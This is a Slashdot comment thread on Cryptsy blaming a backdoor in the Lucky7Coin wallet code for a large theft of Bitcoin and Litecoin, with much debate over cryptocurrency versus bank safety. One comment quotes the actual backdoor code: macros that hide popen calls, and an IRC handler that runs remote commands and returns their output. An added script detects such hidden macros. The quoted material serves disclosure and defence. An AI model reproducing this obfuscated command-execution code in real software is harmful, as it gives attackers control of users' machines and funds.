Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com)
An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands at more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.
No sympathy here. (Score:5, Insightful)
Summary is a lot of spin also... (Score:3)
Well, as the current Litecoin value is around $3, I don't think you can exactly blame that for dropping it from $9.50... Especially as this was 6 months ago.
The $9.50 spike that lasted a couple of days was highly unusual, and even then the $9.50 value was only ever sellers' wet dreams, $8 was more like, and the spike lasted days, and never got down to $2. Any more BS we want to throw into the summary?
Re: (Score:2)
We unfortunately have them, so the effects can't be ignored; but it takes an entire industry of obscurantist derivative pushers to produce the amount of chaos these exchanges handle daily.
Re: (Score:3)
All of those things you mentioned are not a currency. When the stock market crashed, or the dot com bubble crashed, or the "global financial meltdown" happened, did the 10 dollars in your pocket turn into 2 dollars?
Re: (Score:2, Informative)
All of those things you mentioned are not a currency. When the stock market crashed, or the dot com bubble crashed, or the "global financial meltdown" happened, did the 10 dollars in your pocket turn into 2 dollars?
No, it took Jimmy Carter to do that.
Re: (Score:2)
Carter just inherited the mess. Nixon was the one to blame:
https://en.wikipedia.org/wiki/... [wikipedia.org]
Re: (Score:2)
Yes, in a lot of ways it did exactly that. All the packages of cereal on the store shelves stayed the same size and so did the price but the content shrank. The price of fuel skyrocketed. All that talk of deflation and stagnation was bullshit. It only looked that way on the bottom line because there was sharp deflation in a particular asset class that happened to make up a large part of the economy. Worked out real well for you if you were looking to buy real-estate, not so well if you were an owner and
Re: Floriculture. (Score:2)
Floriculture, the raising of flowers for sale, is a $100 billion a year business. That includes tulips. Just because tulips were overpriced once upon a time, or dotcom stocks or real estate more recently, does not mean they have no value.
Re: (Score:2)
I don't feel any sympathy either, but your and my feelings aren't what's important here. We're still talking about a theft and on general principles I think the people who did it ought to be caught and punished.
HA HA (Score:3)
Re: (Score:3)
was it teleported out via a backdoor in the broker software? Or do you still own those shares and will the value come back as the market rises?
Re: (Score:2)
No, they buy high and sell low whenever the TV tells them to be interested, or afraid.
Re: (Score:2)
No one loses jack shit until they sell. Those who are automatically buying are going to make out like bandits.
Re: (Score:2)
Meanwhile.... 2.39% of my "realcoin" disappeared on Wall Street today...
Unless you mean someone accessed your account and transferred out 2.39% of your fiat then no, your analogy is wrong. Price fluctuation != Coins/Fiat leaving your account. With price fluctuation nothing is lost unless you sell. Without a sale that down 2.39% is trivia, just like the up 2.xx% the day before.
That is true if it is a pure investment, but not if it is a currency. Are you attempting to agree that cryptocurrency is so awful as currency, that it is not reliably spendable?
Stocks are not supposed to be liquid assets. Currency is. If you have to wait to spend it in order to not lose money, it is not liquid, and is therefore a complete failure as a currency.
Stocks are intended as shared ownership of a company, there are real reasons why that is on a different time scale than currency. When I used a finan
Re: (Score:2)
So put them into some kind of altcoin. I hear that's a really good place to put your money these days.
Re: (Score:2)
Actually, it's the other way around. The value of cash relative to "the market" increased today.
Re: (Score:2)
Fiat currency A --> bitcoins --> wallet --> backdoor --> El Chapo
Re: (Score:2)
Because what I want is to have to pay someone else to use my "money".
Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
Re: (Score:2)
> Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
Actually, you pay for that piece of paper over time, because the Treasury Department has to keep printing new ones to replace the ones that wear out, and printing and distributing cash costs money. It's buried in your federal taxes. Also, paper money isn't untraceable. Large bills go through readers that record the serial numbers, and can link that to who
Found a Trojan in the wallet? (Score:5, Funny)
Re: (Score:2)
No, no, the news is that it's a backdoor Trojan.
You're a decade late on anybody caring, though.
The internet is saving the world, through pr0n.
picante on my screen (Score:1)
Over and over (Score:5, Insightful)
This is going to happen over and over and over and over and over. It'll be a looooooooong time, if ever, before virtual currencies are protected in any meaningful way against this sort of thing.
Look at it this way: there are maybe a half-dozen people running a something-coin exchange, but there are essentially a limitless number of bad guys out there who, from the safety of their basements, can spend all the time in the world thinking up ways to crack your system. Sooner or later one of them is going to do it, and *boom*, away go the something-coins. And that's assuming that the something-coin exchange guys aren't themselves in on it or playing along. Or "go bad" later. Or get extorted, or find themselves in a jam and need some money ASAP. The attack surface is, in a word, enormous.
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies. All of the people who lost money in this will, in all likelihood, never get a dime back. And worse yet, even the people who didn't lose money directly still take a hit when the currency undergoes devaluation because of the robbery. It seems like there are a LOT of risks and not many rewards.
I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...
Re: (Score:2)
I just know that I keep wanting to read the title as "Crappy Bitcoin Trader...".
Re: (Score:2)
What you said + and
Yes, real banks get robbed,
And real commercial banks don't debit the depositors for the money that was taken.
Re: (Score:2)
And real commercial banks don't debit the depositors for the money that was taken.
In Cyprus they did, and in Europe they will. Like the flu, it will hit these shores soon.
No, you're confusing the hyperbole with the facts. They're not interchangeable.
Re: (Score:2)
This, precisely.
We are all here statisticians.
Look at the population sizes and probabilities of the demographics.
As JustAnotherOldGuy points out, there are a few cyber coin exchanges and a shit load of headcount that would like to grab some play dough.
Given the small number of players inside the exchange perimeters as compared to the billions who are on the outside, trying to get in, and given that ALL players have the same goddam hardware and software and mental capabilities, the odds are that many peop
Re: (Score:2)
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
At least here in Norway real world bank robberies are extremely rare, mainly because the traditional banks barely have money anymore. Most of them simply have an indoor ATM and that's all the cash they have. Apart from all that goes electronic, most of the cash comes from ATMs/withdrawals in stores, the stores collect it and it goes via armored cars to a few teller centrals before it's distributed to ATMs again. We had one such robbery 12 years ago where they got away with the equivalent of ~10 million USD, tho
Re: (Score:2)
No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies.
You do realize that normal banks also have websites, right? And that the money in your bank account isn't actually comprised of bills sitting in a locker?
Bank 'robberies' nowadays happen in a very different way than they used to, but they still happen. The thing with normal banks is that they are enormous institutions with huge budgets for security (for obvious reasons).
"Look at it this way: there are maybe a half-dozen banks in your country, but there are essentially a limitless number of bad guys out ther
Re: (Score:2)
You do realize that normal banks also have websites, right? And that the money in your bank account isn't actually comprised of bills sitting in a locker?
Bank 'robberies' nowadays happen in a very different way than they used to, but they still happen.
You do realize that the money in my account is backed by the institution, right? And you do realize that the institution or the FDIC or the government will replace my money if it's stolen?
And you do realize that the people who just lost their ass in the latest bitcoin robbery are shit out of luck, unlike me, right? And you do realize that the people who just got screwed in the latest bitcoin robbery will almost certainly never get a dime back, right, because according to the article itself, no one will even
Re: (Score:2)
You do realize that the money in my account is backed by the institution, right? And you do realize that the institution or the FDIC or the government will replace my money if it's stolen?
Yes, I do, but it is irrelevant to the point I was making. You painted a very outdated picture of bank robberies with 'bullets flying around' and I corrected you (in a needlessly snarky way, admittedly). The idea that banks can only be 'robbed' physically is simply wrong.
Works exactly the same?
Yes. I was pointing out your flawed logic, not stating that normal currencies and bitcoin-like currencies work exactly the same.
The notion that bitcoin-like currencies are different because the good guy (exchange) providers to bad guy hacke
Re: (Score:2)
Yes, I do, but it is irrelevant to the point I was making. You painted a very outdated picture of bank robberies with 'bullets flying around' and I corrected you (in a needlessly snarky way, admittedly). The idea that banks can only be 'robbed' physically is simply wrong.
I never said that they can only be robbed physically, even though it still is the most popular method.
The difference is that regardless of how the bank is robbed, I'll still get my money back. Whether it's with a gun or a trojan, I'll still get my money back. The same can't be said for x-coins. Look at Mt. Gox, Inputs.io, Sheep Marketplace, Silk Road, etc etc....none of the victims, to my knowledge, ever recovered a dime of the ~$180 million stolen.
Virtual currencies do have some serious, unavoidable probl
Re: (Score:2)
I never said that they can only be robbed physically, even though it still is the most popular method.
It is not:
http://abcnews.go.com/Business... [go.com]
https://www.fbi.gov/stats-serv... [fbi.gov]
http://www.informationweek.com... [informationweek.com]? (note that the stats are from 2006)
Also, you said this:
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
Note how the contrast you present completely focuses on the physical nature. Had you said that banks have better digital security than some crappy Bitcoin-exchange there would have been no issue. To say that you didn't imply that the 'real time and effort' had to do with 'bullets flying around, get-away cars, bank guards, hauling t
Re: (Score:2)
The difference is that regardless of how the bank is robbed, I'll still get my money back.
This is still irrelevant to this thread, as I pointed out before.
Lol, hardly....that's what this whole thread is about. You put your money in a bank and it's relatively safe, even if it gets robbed.
If you put your money in bitCoin, dogeCoin, dinfinityCoin, whateverCoin, and if it's ripped off, it's gone. That's pretty much what I started out saying.
Also, the stats you provided don't show shit:
1) One is a "look back" at "great bank robbers in history" (completely irrelevant),
2) The 2nd are FBI stats that ALSO don't show shit in terms of physical vs. electronic robbery,
3)
Re: (Score:2)
that's what this whole thread is about
It's not. The whole 'bullets flying' and 'limitless number of bad guys' bullshit came out of your keyboard, not mine. Don't pretend that didn't happen.
If you put your money in bitCoin, dogeCoin, dinfinityCoin, whateverCoin, and if it's ripped off, it's gone. That's pretty much what I started out saying.
Again, nobody is saying otherwise or has said otherwise in this thread. Stop repeating irrelevant truths. It's just noise in this thread.
The article is actually all about stealing from the bank's customers.
Yes, that is what electronic bank robberies always amount to, be they of Bitcoin or of traditional currency. Only counting people stealing assets from the corporations themselves at this point would be stupid, as there is no
Re: (Score:2)
It's not. The whole 'bullets flying' and 'limitless number of bad guys' bullshit came out of your keyboard, not mine. Don't pretend that didn't happen.
Lol, found the BitCoin fundy.
Sorry, but it all boils down to this (which is what I said at the very beginning): something-coin stuff is still waaaaaay too immature and uncertain to have any credibility in the larger marketplace. But go ahead and feel free to trust "Slick Jimmy's BitCoins Savings and Loan and Stuff" if you like. :)
Even Mike Hearn, one of Bitcoin's lead developers, has now quit and says, "Despite knowing that bitcoin could fail all along, the now inescapable conclusion that it has failed still
Re: (Score:2)
You lack the ability to stay on topic and the fortitude to admit when you are wrong. Good day.
Re: (Score:2)
>> I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...
Something tells me that you don't know anything about multisig wallets...
If people would stop trusting 3rd parties to hold their bitcoins for them, then problems like the one at Cryptsy would stop.
Re: (Score:2)
Something tells me that you don't know anything about multisig wallets...
If people would stop trusting 3rd parties to hold their bitcoins for them, then problems like the one at Cryptsy would stop.
Are you willing to go on record right now and state categorically that using multisig wallets will absolutely prevent your coins from being stolen, or that there is no way to hack, spoof, or otherwise get around the safety a multisig wallet provides?
I thought not.
Huh? (Score:2)
Blames Backdoor In the Code of a Wallet
Or maybe it was bad security.
Re: (Score:3)
It's been bad security for months.
Why people expect a robust, mature, and functioning degree of security in something which is brand new, and essentially the wild west is beyond me.
How many huge bitcoin thefts have there been? And just why would we think something which has value isn't going to be the target of theft?
These are lessons the banking industry has learned over decades, and taken steps to prevent.
But suddenly someone invents crypto currency and they act all surprised to get ripped off ... and the
Re: (Score:2)
>> Why the fuck do people keep believing that some wallet or exchange which came into existence a few months ago is secure?
The good news is, you don't need to worry if 3rd party exchanges or wallet providers are secure or not. Try using a multisig wallet (like at BitGo) where you hold two of the keys, and the company holds one. It takes two keys to conduct a transaction. If the company is hacked, your bitcoin can't be stolen. It really is that simple. I'm not saying it's impossible, but the risk
What? (Score:2)
I'm more shocked to learn that Litecoin went up as high as $9.50.
WTF (Score:2)
A wallet is a non-executable data file.
You can't get a trojan from one.
Unless you're retarded and use a third party service or program to MANAGE wallets.
known for months (Score:5, Informative)
https://github.com/alerj78/luc... [github.com]
dooglus commented on Mar 8, 2015
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.
In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:
#define S_ORDER(a,b,c,d) b##a##d##c
/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)
/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
Then in irc.cpp they are used to implement the backdoor:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
I expect this is a known issue since this kind of thing doesn't happen accidentally.
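A reviewer-side check for the macro trick described in the comment above, as an added example that is not part of the original comment or of any project's code: it expands `##` token pasting and split string literals in `#define` lines and reports expansions that land on a watchlist. The watchlist and all function names are assumptions; the sample input is the macro lines quoted in the comment.

```python
import re

# Assumed reviewer watchlist: names that should not appear only via macro tricks.
WATCHLIST = {"popen", "pclose", "system", "execve", "dlopen", "PRIVMSG"}

DEFINE_RE = re.compile(r'^\s*#\s*define\s+(\w+)(?:\(([^)]*)\))?\s+(.*?)\s*$')
CALL_RE = re.compile(r'^(\w+)\s*\(([^()]*)\)$')
SPLIT_STRING_RE = re.compile(r'^"[^"]*"(?:\s*"[^"]*")+$')

# Macro lines as quoted in the comment above, one comment fragment included.
SAMPLE = r'''
#define S_ORDER(a,b,c,d) b##a##d##c
 * OS-dependent memory page locking/unlocking.
#define CLine S_ORDER(I,F,E,L)
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
'''


def parse_defines(source):
    """Split #define lines into function-like and object-like macros."""
    functions, objects = {}, {}
    for line in source.splitlines():
        m = DEFINE_RE.match(line)
        if not m:
            continue  # not a #define (comments, code, blank lines)
        name, params, body = m.groups()
        if params is None:
            objects[name] = body
        else:
            functions[name] = ([p.strip() for p in params.split(",")], body)
    return functions, objects


def paste(params, body, args):
    """Expand a body made only of '##'-joined tokens, as the preprocessor would."""
    binding = dict(zip(params, args))
    return "".join(binding.get(tok.strip(), tok.strip()) for tok in body.split("##"))


def resolve(source):
    """Map each object-like macro to the identifier or string it really denotes."""
    functions, objects = parse_defines(source)
    resolved = {}
    for name, body in objects.items():
        call = CALL_RE.match(body)
        if call and call.group(1) in functions:
            params, fbody = functions[call.group(1)]
            args = [a.strip() for a in call.group(2).split(",")]
            if "##" in fbody and len(args) == len(params):
                resolved[name] = paste(params, fbody, args)
        elif SPLIT_STRING_RE.match(body):
            # Adjacent string literals are concatenated by the compiler.
            resolved[name] = "".join(re.findall(r'"([^"]*)"', body))
    return resolved


def find_hidden(source):
    """Return (macro, real_name) pairs whose expansion is on the watchlist."""
    return sorted((m, r) for m, r in resolve(source).items() if r in WATCHLIST)


if __name__ == "__main__":
    for macro, real in find_hidden(SAMPLE):
        print(f"{macro} expands to {real}")
```

A plain text search for `popen` over the same lines finds nothing, which is why the check has to expand the macros first.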
Re: (Score:2)
In a word? Bittards
Re: known for months (Score:2, Informative)
IRC was one of the initial means of peer discovery. It has been long since replaced with better mechanisms.
Re: (Score:2)
Bitcoin is primarily for illegal activity right now.
Re: (Score:2)
That exact calculation was done by the Silk Road prosecutors, so we know that 4% of bitcoin transactions were for drugs during the time that marketplace was operating. Whereas for the world economy in general, illegal drugs account for 3% of GDP. It's not an entirely different picture, it's the same picture.
The Developer of Lucky7Coin... (Score:5, Informative)
It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new GitHub repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.